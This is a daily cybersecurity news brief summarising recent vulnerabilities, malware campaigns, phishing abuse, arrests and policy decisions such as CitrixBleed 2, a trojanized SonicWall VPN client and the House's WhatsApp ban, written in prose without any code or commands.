Daily Brief

Citrix addressed a critical vulnerability in its NetScaler ADC and NetScaler Gateway products, comparable to the previous CitrixBleed flaw exploited in significant ransomware attacks. The newly identified bug, nicknamed "CitrixBleed 2" by security analyst Kevin Beaumont, received a 9.3 severity rating and allows attackers to bypass multi-factor authentication. Affected versions include NetScaler ADC and Gateway versions 12.1 and 13.0, which are end-of-life and will not receive updates—upgrading is recommended. The flaw, an out-of-bounds read issue tracked as CVE-2025-5777, permits unauthorized remote attackers to read session tokens and other sensitive data, mainly affecting setups commonly used in large organizations. Citrix advises customers to update their systems urgently to the supported versions and execute specific commands to kill active sessions for enhanced security. No reports confirm the in-the-wild exploitation of CVE-2025-5777 yet, but experts like Beaumont and Benjamin Harris from watchTowr suggest that it is only a matter of time before it gets exploited, given its severity and nature. Modifications in the National Vulnerability Database regarding the exposure level of the management interface indicate an increased risk factor for this vulnerability. Organizations are warned to treat this as an imminent IT security incident to avoid potential future attacks that could exploit this vulnerability.

SonicWall has issued a warning about a trojanized version of its NetExtender SSL VPN client that is designed to steal VPN credentials. The fake NetExtender installer mimics version 10.3.2.27 and is hosted on a website crafted to deceive users into believing it's the legitimate SonicWall site. The installer, while not signed by SonicWall, uses a signature from "CITYLIGHT MEDIA PRIVATE LIMITED" to evade basic security checks. Modifications in the malware include altered binaries in NeService.exe to bypass certificate verifications and added malicious code in NetExtender.exe to exfiltrate VPN credentials. The stolen data, including usernames and passwords, is sent to a remote server once the user attempts to connect via the malicious VPN client. SonicWall advises downloading software only from its official websites and highlights that their security tools, along with Microsoft Defender, now block these malicious installers. Users are advised to avoid downloading software from promotional links and to always verify files with updated antivirus software before installation.

The U.S. Embassy in India announced new visa application guidelines requiring applicants to make their social media accounts public. The directive affects F, M, and J nonimmigrant visa categories, which include students and exchange visitors. Making social media profiles public is intended to assist in the vetting process for establishing identity and eligibility of applicants. Refusal to adjust privacy settings to public could lead to visa application rejection. This change is part of broader measures to ensure national security during the visa vetting process. Social media identifiers have been a required part of U.S. visa applications since 2019. The U.S. Department of State emphasizes the need to protect national interests and ensure applicants do not pose security threats. Other U.S. embassies worldwide have issued similar directives, including the necessity to provide historical social media usernames.

SonicWall and Microsoft discovered a fake SonicWall SSL VPN app designed to steal user credentials. The fraudulent app distributed a Trojanized version of the official SonicWall NetExtender software. Malicious actors used a digitally-signed but fake certificate from "CITYLIGHT MEDIA PRIVATE LIMITED" to lend credibility to the installer. Users were tricked into downloading the app from spoofed websites that mimicked legitimate download portals. The tampered app bypassed digital certificate validation checks and installed malware that collected VPN configurations—usernames, passwords, domains—and sent this data to a remote server controlled by attackers. Two modified files within the app, NeService.exe and NetExtender.exe, were specifically designed to execute the malicious operations. Despite takedowns of the fake sites and revocation of the fraudulent digital certificate, the threat persists due to the simplicity of creating new malicious domains. SonicWall advises downloading software directly from official vendor sites to avoid such security risks.

Trezor's automated support system is being used to send phishing emails that appear to be from legitimate company addresses. Attackers create support tickets with urgent phishing messages as titles, which are then automatically emailed to users. The phishing emails direct users to a fake site where they are prompted to input their wallet seed phrase. Possession of a seed phrase allows unauthorized users to gain full access to a victim’s cryptocurrency assets. Trezor has issued warnings to users never to share their seed phrases and is working on measures to prevent future incidents. This exploitation of Trezor’s support system follows several previous security breaches and phishing campaigns targeting Trezor users. Details on the ongoing situation and defense tips against phishing are available on Trezor's dedicated online guide.

Organizations often misunderstand the completeness of their vulnerability scans, missing 10-20% of devices that never get scanned. Vulnerability management platforms can mislead with clean metrics, while significant asset visibility issues and gaps remain. Detected devices may still have incomplete scans due to missing agents or credentials, leaving unassessed vulnerabilities. Common platform features lack mechanisms to natively identify never-scanned devices, impacting overall security posture. Case studies highlight the severe impacts of these gaps, including unpatched systems leading to breaches in financial and healthcare sectors. Continuous inventory assessments and cross-referencing data from multiple systems are recommended for accurate coverage verification. The article encourages a shift from reliance on platform-native reports to continuous validation and monitoring of asset inventories for real-time security management. Prelude Security suggests that organizations should not solely depend on vendor reports but should proactively identify and address visibility gaps.

A cybersecurity researcher named mr.d0x has developed a new attack variant called FileFix, which manipulates the address bar in Windows File Explorer to execute malicious commands. FileFix is derived from ClickFix, a social engineering technique that previously used browsers to trick users into executing harmful PowerShell commands. Unlike ClickFix, FileFix utilizes a more familiar and trusted component of Windows, the File Explorer, to deceive users into pasting malicious commands under the guise of handling shared files. By misrepresenting the functionality of buttons and links, the phishing page conceals the harmful commands within what appears to be legitimate user interactions, thus increasing the likelihood of user compliance. The method of hiding malicious code within seemingly benign commands in File Explorer potentially increases the attack's stealth and effectiveness. FileFix could be used by cybercriminals to deploy malware, ransomware, and conduct targeted phishing attacks due to its simplicity and the ubiquity of Windows File Explorer. mr.d0x believes that, similar to his previous discoveries, FileFix will likely be quickly adopted by malicious actors for its straightforwardness and the trust placed in standard Windows utilities by users. The researcher has demonstrated the viability of FileFix with a proof-of-concept, which he discussed with the tech media outlet BleepingComputer, emphasizing its potential for harm if leveraged by cyber attackers.

Akamai researchers have developed two new methods to counteract cryptocurrency mining botnets by exploiting mining protocols. These techniques manipulate mining topologies and pool policies, drastically reducing the effectiveness of cryptomining botnets and potentially leading to their shutdown. The first method, known as "bad shares," involves submitting invalid mining results to get a mining proxy banned from the network, which halts the botnet's operation. The second technique utilizes the direct connection of a miner to a pool to initiate over 1,000 login requests with the attacker's wallet, temporarily banning it for an hour. Both strategies are designed to exploit vulnerabilities in the Stratum mining protocol used in common topologies, causing significant disruption to malicious mining operations. The methods currently target Monero miners but can be adapted to other cryptocurrencies as well. These defensive tactics enable the rapid recovery of legitimate miners from attacks, contrasting with the challenging recovery process for malicious operations.

The evolution of penetration testing has led to various models including Point-in-Time Pentests, PTaaS, Bug Bounty Programs, and Automated Tools, with Continuous Penetration Testing (CPT) proving most effective. Legacy pentests offer a static and periodic snapshot that fails to match the dynamic nature of modern threats; CPT offers always-on, real-world attack simulation. CPT integrates human expertise with automation, providing continuous coverage, real-time alerts, unlimited retesting, and faster remediation times, which proves crucial against the fast pace at which new vulnerabilities are weaponized. While CPT requires a higher initial investment, it offers significant long-term benefits by aligning closely with modern development practices and persistent threat landscapes. Various penetration testing models were compared, highlighting Continuous Penetration Testing as a superior method due to its comprehensive and proactive approach in a fast-evolving threat environment. The shift from annual or periodic testing to continuous testing models enables organizations to stay ahead of threats and more effectively protect sensitive data. Sprocket Security provides these services, emphasizing the strategic, operational, and cost benefits of transitioning to a continuous penetration testing model.

The U.S. House of Representatives has implemented a ban on WhatsApp for use on all government-issued devices among congressional staff due to security concerns over its data encryption and storage processes. Staffers can still use WhatsApp on their private devices, but these devices are prohibited in secure areas like classified briefings or secure facilities. The ban extends to numerous device types, including mobile phones, laptops, desktop computers, and additionally any web browsers on such devices. The Chief Administrative Officer (CAO) of the House, Catherine Szpindor, emphasized that the priority is to safeguard the House and its members from potential cybersecurity threats. Alternatives recommended by the House CAO include Microsoft Teams, Wickr, Signal, iMessage, and FaceTime, all of which are considered to have acceptable security features for official communications. WhatsApp responded strongly against the ban, arguing that the app's default end-to-end encryption provides better security compared to many apps on the House's approved list. The news surfaces amid broader efforts by the House to limit use of potentially risky technology platforms and applications, including ByteDance apps like TikTok and certain AI tools like ChatGPT.

Unidentified hackers are targeting Microsoft Exchange servers globally to insert keyloggers on login pages and steal credentials. Analysis by Positive Technologies revealed two types of JavaScript keylogger codes affecting servers in 26 countries across various sectors including government, finance, IT, and education. The campaign, first documented in May 2024, exploits known Exchange Server vulnerabilities such as ProxyShell to deploy malicious code. Compromised data includes user credentials and cookies, transmitted discreetly to avoid detection using methods like local file storage and external Telegram bots. The attacks initially detected in Africa and the Middle East, have now expanded worldwide with significant concentrations in Vietnam, Russia, Taiwan, China, and several other countries. Researchers warn many Exchange servers are still susceptible to older vulnerabilities, allowing attackers to remain undetected for extended periods. 22 government servers have been notably compromised, highlighting the significant impact on state operations.

Four members of the notorious REvil ransomware group were released from Russian detention after serving most of their five-year sentences since their 2022 arrest. The individuals, convicted for crimes including the use of malicious programs and illegal financial activities, were freed due to time considered served in pre-trial detention. The released members had complied with legal demands, including forfeiting luxury assets like BMWs and a significant sum of money. In contrast, four other members who did not plead guilty received harsher sentences ranging from 4.5 to six years, demonstrating a discrepancy in sentencing based on plea decisions. REvil, known for high-profile ransomware attacks including against US nuclear contractors and international businesses, was effectively dismantled in a joint FBI-led operation in 2021. While convictions continue in Russia, extradition efforts by the US have seen limited success, notably with the extradition and sentencing of a Ukrainian REvil member in the US. The case highlights ongoing international efforts and challenges in managing cybercrime and the varied outcomes based on judicial and geopolitical dynamics.

Cybersecurity leaders from diverse sectors discussed the challenges of implementing Continuous Threat Exposure Management (CTEM) at the Xposure Summit 2025. Key strategies include starting with asset inventory and identity management, and validating internal and external-facing assets frequently to adapt to rapidly changing environments. The discussion highlighted the importance of converting cybersecurity issues into risk management language that boards and regulators can understand. Success in CTEM is measured not by counting vulnerabilities but by the reduction of exploitable attack paths and effectively conveying risk levels to company leadership. The panel emphasized the difference between traditional vulnerability management and CTEM, focusing on real-world threat simulations and testing defense mechanisms beyond mere patching. The conversation also touched on the necessity of threat intelligence as a backbone for security testing programs, emphasizing understanding and simulating adversary tactics, techniques, and procedures (TTPs). Frequent validation of security measures is crucial, with weekly checks for internal assets and daily for external ones, to maintain control over security environments continuously.

Hackers are targeting misconfigured Docker APIs to infiltrate containerized environments and deploy cryptocurrency miners, exploiting Tor for anonymity. The attack commences by probing vulnerable systems to list or create Docker containers, utilizing the "alpine" Docker image and mounting crucial directories. This setup allows attackers to execute a Base64-encoded script to install Tor, enabling them to mask their activities and fetch remote scripts from a .onion domain. Post-installation, attackers modify SSH configurations and insert their SSH key to facilitate unauthorized access, enhancing their control over the host system. Additional tools such as masscan, libpcap, zstd, and torsocks are installed by the attackers for further actions and communication with their C&C server. The final payload includes the XMRig miner, set up with specific configurations and wallet addresses, primarily targeting the technology, finance, and healthcare sectors. Trend Micro's research signals an ongoing trend where attackers exploit vulnerabilities in cloud environments for cryptojacking operations.

The U.S. House of Representatives has banned the use of WhatsApp on all government-issued devices among congressional staff due to security and data protection concerns. This decision follows reports by the House Chief Administrative Officer (CAO) labeling WhatsApp as a "high-risk" application due to its inadequate data protection practices, including a lack of transparency and absence of stored data encryption. WhatsApp, owned by Meta, has countered these allegations, asserting that its platform ensures end-to-end encryption on all messages and provides a high level of security. Meta's Communication Director, Andy Stone, expressed strong disagreement with the CAO's claims and highlighted the widespread use of WhatsApp by congressional members and staff. The CAO suggested alternative communication apps deemed more secure, such as Microsoft Teams, Amazon's Wickr, Signal, and Apple's iMessage and FaceTime. The prohibition of WhatsApp follows recent bans on other apps like TikTok, OpenAI ChatGPT, and DeepSeek by the House. WhatsApp has also been in the news for integrating advertisements into its platform, a move that the company asserts does not compromise user privacy.